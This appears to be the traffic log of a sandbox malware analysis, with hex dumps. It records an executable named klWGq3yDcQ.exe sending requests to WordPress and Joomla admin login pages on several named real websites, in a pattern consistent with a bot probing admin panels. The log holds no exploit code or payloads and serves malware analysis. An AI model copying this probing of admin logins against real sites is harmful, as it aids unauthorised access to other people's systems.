                                                                                                                                                                                                    2023-11-26 05:59:36 UTC511INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 65 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 6c 69 6e 6b 3a 20 3c 68 74 74 70 73 3a 2f 2f 6d 79 64 69 72 65 63 74 6c 65 6e 64 65 72 2e 63 6f 6d 2f 77 70 2d 6a 73 6f 6e 2f 3e 3b 20 72 65 6c 3d 22 68 74 74 70 73 3a 2f 2f 61 70 69 2e 77 2e 6f 72 67 2f 22 0d 0a 74 72 61 6e 73 66 65 72
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundConnection: closeexpires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://mydirectlender.com/wp-json/>; rel="https://api.w.org/"transfer
                                                                                                                                                                                                    2023-11-26 05:59:36 UTC857INData Raw: 38 64 65 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 27
                                                                                                                                                                                                    Data Ascii: 8de5<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="http://gmpg.org/xfn/11"> <meta name='robots' content='noindex, nofollow'
                                                                                                                                                                                                    2023-11-26 05:59:36 UTC14994INData Raw: 61 67 69 6e 67 20 66 6f 72 20 4d 79 44 69 72 65 63 74 4c 65 6e 64 65 72 2e 63 6f 6d 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 44 69 72 65 63 74 20 4c 65 6e 64 65 72 73 2c 20 4c 4c 43 22 2c 22 70 75 62 6c 69 73 68 65 72 22 3a 7b 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 6d 79 64 69 72 65 63 74 6c 65 6e 64 65 72 2e 63 6f 6d 2f 23 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 7d 2c 22 70 6f 74 65 6e 74 69 61 6c 41 63 74 69 6f 6e 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 53 65 61 72 63 68 41 63 74 69 6f 6e 22 2c 22 74 61 72 67 65 74 22 3a 7b 22 40 74 79 70 65 22 3a 22 45 6e 74 72 79 50 6f 69 6e 74 22 2c 22 75 72 6c 54 65 6d 70 6c 61 74 65 22 3a 22 68 74 74 70 73 3a 2f 2f 6d 79 64 69 72 65 63 74 6c 65 6e 64 65 72 2e 63 6f 6d 2f 3f 73 3d 7b 73 65 61 72 63 68
                                                                                                                                                                                                    Data Ascii: aging for MyDirectLender.com","description":"Direct Lenders, LLC","publisher":{"@id":"https://mydirectlender.com/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://mydirectlender.com/?s={search
                                                                                                                                                                                                    2023-11-26 05:59:36 UTC16384INData Raw: 6d 61 6c 6c 2d 66 6f 6e 74 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 73 6d 61 6c 6c 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6d 65 64 69 75 6d 2d 66 6f 6e 74 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6c 61 72 67 65 2d 66 6f 6e 74 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 78 2d 6c 61 72 67 65 2d 66 6f 6e 74 2d 73
                                                                                                                                                                                                    Data Ascii: mall-font-size{font-size: var(--wp--preset--font-size--small) !important;}.has-medium-font-size{font-size: var(--wp--preset--font-size--medium) !important;}.has-large-font-size{font-size: var(--wp--preset--font-size--large) !important;}.has-x-large-font-s
                                                                                                                                                                                                    2023-11-26 05:59:36 UTC4098INData Raw: 2d 73 69 64 65 62 61 72 20 63 6f 6c 2d 6d 64 2d 33 20 63 6f 6c 2d 31 32 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 73 65 61 72 63 68 2d 31 22 20 63 6c 61 73 73 3d 22 77 69 64 67 65 74 20 77 69 64 67 65 74 5f 73 65 61 72 63 68 22 3e 3c 66 6f 72 6d 20 72 6f 6c 65 3d 22 73 65 61 72 63 68 22 20 6d 65 74 68 6f 64 3d 22 67 65 74 22 20 69 64 3d 22 73 65 61 72 63 68 66 6f 72 6d 22 20 63 6c 61 73 73 3d 22 73 65 61 72 63 68 66 6f 72 6d 22 20 61 63 74 69 6f 6e 3d 22 68 74 74 70 73 3a 2f 2f 6d 79 64 69 72 65 63 74 6c 65 6e 64 65 72 2e 63 6f 6d 2f 22 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 6c 61 62 65 6c 20 63 6c 61 73 73 3d 22 73 63 72 65 65 6e 2d 72 65 61 64 65 72 2d 74 65 78 74 22 20 66 6f 72 3d 22 73 22 3e
                                                                                                                                                                                                    Data Ascii: -sidebar col-md-3 col-12"> <div id="search-1" class="widget widget_search"><form role="search" method="get" id="searchform" class="searchform" action="https://mydirectlender.com/"><div><label class="screen-reader-text" for="s">
                                                                                                                                                                                                    2023-11-26 05:59:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    177192.168.2.459246104.200.30.314436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:37 UTC221OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                    Host: edgewater.group
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://edgewater.group/wp-login.php
                                                                                                                                                                                                    2023-11-26 05:59:37 UTC164INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 37 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 39 36 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:37 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    2023-11-26 05:59:37 UTC196INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    178192.168.2.45922366.235.200.1474436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:37 UTC378OUTGET /wp-login.php?redirect_to=https%3A%2F%2Ftradeavenida.com%2Fwp-admin%2F&reauth=1 HTTP/1.1
                                                                                                                                                                                                    Host: tradeavenida.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: _cfuvid=CCSTuNw27vjAGhe0LambVrEDd4CnmWBK1UKexrI2tUk-1700978372739-0-604800000
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: http://tradeavenida.com/wp-login.php
                                                                                                                                                                                                    2023-11-26 05:59:37 UTC227INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 39 20 43 6f 6e 66 6c 69 63 74 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 37 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 4d 49 53 53 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 32 62 66 65 38 30 62 65 61 35 65 32 30 61 35 2d 49 41 44 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 409 ConflictDate: Sun, 26 Nov 2023 05:59:37 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: MISSServer: cloudflareCF-RAY: 82bfe80bea5e20a5-IAD
                                                                                                                                                                                                    2023-11-26 05:59:37 UTC89INData Raw: 35 33 0d 0a 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 68 75 6d 61 6e 73 5f 32 31 39 30 39 3d 31 22 3b 20 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 74 72 75 65 29 3c 2f 73 63 72 69 70 74 3e 0d 0a
                                                                                                                                                                                                    Data Ascii: 53<script>document.cookie = "humans_21909=1"; document.location.reload(true)</script>
                                                                                                                                                                                                    2023-11-26 05:59:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    179192.168.2.459345162.241.62.2204436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:37 UTC297OUTGET /wp-login.php?redirect_to=https%3A%2F%2Flumaruniformes.com%2Fwp-admin%2F&reauth=1 HTTP/1.1
                                                                                                                                                                                                    Host: lumaruniformes.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: http://lumaruniformes.com/wp-login.php
                                                                                                                                                                                                    2023-11-26 05:59:37 UTC162INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 39 20 43 6f 6e 66 6c 69 63 74 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 37 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 38 33 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 409 ConflictDate: Sun, 26 Nov 2023 05:59:37 GMTServer: ApacheContent-Length: 83Connection: closeContent-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    2023-11-26 05:59:37 UTC83INData Raw: 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 68 75 6d 61 6e 73 5f 32 31 39 30 39 3d 31 22 3b 20 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 74 72 75 65 29 3c 2f 73 63 72 69 70 74 3e
                                                                                                                                                                                                    Data Ascii: <script>document.cookie = "humans_21909=1"; document.location.reload(true)</script>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    180192.168.2.459286185.135.132.1054436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:37 UTC237OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                    Host: grantstech.io
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://www.grantstech.io/administrator/
                                                                                                                                                                                                    2023-11-26 05:59:37 UTC365INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 37 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 33 35 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 67 72 61 6e 74 73 74 65 63 68 2e 69 6f 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 69 6e 64 65 78 2e 70 68 70 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20 53 75 6e 2c 20 32
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyDate: Sun, 26 Nov 2023 05:59:37 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 335Connection: closeLocation: http://www.grantstech.io/administrator/index.phpCache-Control: max-age=0Expires: Sun, 2
                                                                                                                                                                                                    2023-11-26 05:59:37 UTC335INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 72 61 6e 74 73 74 65 63 68 2e 69 6f 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 69 6e 64 65 78 2e 70 68 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.grantstech.io/administrator/index.php">here</a>.</p><hr><address>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    181192.168.2.459197194.47.252.1154436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:37 UTC312OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                    Host: www.maxiv.lu.se
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: ff59ae34f86788aafc83adbd6fbb16ab=573a080441b430e46540f849b8105044
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://www.maxiv.lu.se/administrator/
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC414INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 64 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 37 20 47 4d 54 0d 0a 73 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 35 37 20 28 44 65 62 69 61 6e 29 0d 0a 78 2d 70 6f 77 65 72 65 64 2d 62 79 3a 20 50 48 50 2f 38 2e 32 2e 31 32 0d 0a 65 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 6c 69 6e 6b 3a 20 3c 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 61 78 69 76 2e 6c 75 2e 73 65 2f 77 70 2d 6a 73 6f 6e 2f 3e 3b 20 72
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not Founddate: Sun, 26 Nov 2023 05:59:37 GMTserver: Apache/2.4.57 (Debian)x-powered-by: PHP/8.2.12expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <https://www.maxiv.lu.se/wp-json/>; r
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC13086INData Raw: 33 33 31 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 4d 41 58 20 49 56 3c 2f 74 69 74
                                                                                                                                                                                                    Data Ascii: 3316<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; MAX IV</tit
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC16322INData Raw: 33 46 42 41 0d 0a 73 68 65 65 74 27 20 69 64 3d 27 6a 71 75 65 72 79 2d 75 69 2d 73 74 79 6c 65 73 2d 63 73 73 27 20 68 72 65 66 3d 27 2f 2f 63 6f 64 65 2e 6a 71 75 65 72 79 2e 63 6f 6d 2f 75 69 2f 31 2e 31 33 2e 31 2f 74 68 65 6d 65 73 2f 62 61 73 65 2f 6a 71 75 65 72 79 2d 75 69 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 31 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 74 61 62 6c 65 70 72 65 73 73 2d 64 65 66 61 75 6c 74 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 61 78 69 76 2e 6c 75 2e 73 65 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 74 61 62 6c 65 70 72 65 73 73 2f 63 73 73 2f 62 75 69 6c 64 2f 64 65 66 61 75 6c 74 2e 63
                                                                                                                                                                                                    Data Ascii: 3FBAsheet' id='jquery-ui-styles-css' href='//code.jquery.com/ui/1.13.1/themes/base/jquery-ui.css?ver=6.4.1' media='all' /><link rel='stylesheet' id='tablepress-default-css' href='https://www.maxiv.lu.se/wp-content/plugins/tablepress/css/build/default.c
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC16312INData Raw: 33 46 42 30 0d 0a 32 2e 38 34 2d 33 34 2e 35 31 20 37 32 2e 34 35 2d 31 2e 34 32 20 31 2e 34 35 2d 32 2e 38 37 20 32 2e 38 39 2d 34 2e 33 35 20 34 2e 33 34 2d 31 39 2e 36 2d 31 36 2e 34 32 2d 34 32 2e 34 31 2d 33 32 2e 33 36 2d 36 37 2e 34 38 2d 34 37 2e 31 39 7a 22 2f 3e 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 30 31 22 20 63 79 3d 22 34 35 30 22 20 72 3d 22 32 35 22 2f 3e 3c 2f 67 3e 3c 2f 73 79 6d 62 6f 6c 3e 3c 73 79 6d 62 6f 6c 20 69 64 3d 22 74 77 69 74 74 65 72 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 34 20 32 34 22 3e 3c 70 61 74 68 20 64 3d 22 4d 32 33 2e 39 35 34 20 34 2e 35 36 39 61 31 30 20 31 30 20 30 20 30 20 31 2d 32 2e 38 32 35 2e 37 37 35 20 34 2e 39 35 38 20 34 2e 39 35 38 20 30 20 30 20 30 20 32 2e 31 36 33 2d 32 2e 37 32 33 63 2d
                                                                                                                                                                                                    Data Ascii: 3FB02.84-34.51 72.45-1.42 1.45-2.87 2.89-4.35 4.34-19.6-16.42-42.41-32.36-67.48-47.19z"/><circle cx="501" cy="450" r="25"/></g></symbol><symbol id="twitter" viewBox="0 0 24 24"><path d="M23.954 4.569a10 10 0 0 1-2.825.775 4.958 4.958 0 0 0 2.163-2.723c-
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC30INData Raw: 34 32 0d 0a 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 20 66 6f 72 20 75 73 65 72 73 3c 2f
                                                                                                                                                                                                    Data Ascii: 42y requirements for users</
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC42INData Raw: 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 27 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 0d 0a
                                                                                                                                                                                                    Data Ascii: a></li><li class='menu-item menu-item-ty
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC16270INData Raw: 33 46 38 36 0d 0a 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 69 74 65 6d 2d 64 65 70 74 68 2d 33 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 61 78 69 76 2e 6c 75 2e 73 65 2f 75 73 65 72 2d 61 63 63 65 73 73 2f 73 61 66 65 74 79 2f 69 6e 2d 63 61 73 65 2d 6f 66 2d 65 6d 65 72 67 65 6e 63 79 2f 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 6c 61 62 65 6c 22 3e 49 6e 20 63 61 73 65 20 6f 66 20 65 6d 65 72 67 65 6e 63 79 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 27 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 69 74 65 6d
                                                                                                                                                                                                    Data Ascii: 3F86pe-post_type menu-item-object-page item-depth-3'><a href="https://www.maxiv.lu.se/user-access/safety/in-case-of-emergency/" class="menu-item-label">In case of emergency</a></li><li class='menu-item menu-item-type-post_type menu-item-object-page item
